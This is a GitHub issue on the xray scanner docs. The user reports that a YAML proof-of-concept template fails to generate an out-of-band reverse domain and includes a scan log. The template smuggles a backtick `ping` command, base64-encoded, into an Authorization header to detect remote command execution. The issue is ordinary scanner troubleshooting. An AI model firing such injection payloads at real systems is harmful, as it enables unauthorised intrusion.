### ISSUE TITLE
Issue on docs

### ISSUE THREAD

**Issue by NHPT** [chaitin/xray-docs#2]
Path: /plugins/yaml/TypeFunc/exampleType/reverse
```
name: poc-yaml-test
transport: http
set:
  reverse: newReverse()
  reverseUrl: reverse.domain
  cmd: |
    "`ping -c2 " + string(reverseUrl) + "`:abc"
  payload: base64(cmd)
rules:
  r0:
    request:
      method: GET
      path: /
      headers: 
        Authorization: Basic {{payload}}
    expression: reverse.wait(5)
expression: r0()
detail:
  author: xxx
  links:
    - http://xxx.com
```
不会生成域名，运行无报错：
Enabled plugins: [phantasm]

[INFO] 2024-06-01 02:06:22 [phantasm:phantasm.go:114] found local poc ag\poc-yaml-ag-bug158392-rce.yml
[INFO] 2024-06-01 02:06:22 [phantasm:phantasm.go:185] 1 pocs have been loaded (debug level will show more details)
[INFO] 2024-06-01 02:06:22 [reverse:reverse.go:70] remote reverse server check passed
[INFO] 2024-06-01 02:06:23 [default:dispatcher.go:444] processing GET https://192.168.25.130:8888
[INFO] 2024-06-01 02:06:23 [controller:dispatcher.go:553] wait for reverse server finished
[*] All pending requests have been scanned
[*] scanned: 1, pending: 0, requestSent: 1, latency: 136.00ms, failedRatio: 0.00%
[INFO] 2024-06-01 02:06:26 [controller:dispatcher.go:573] controller released, task done
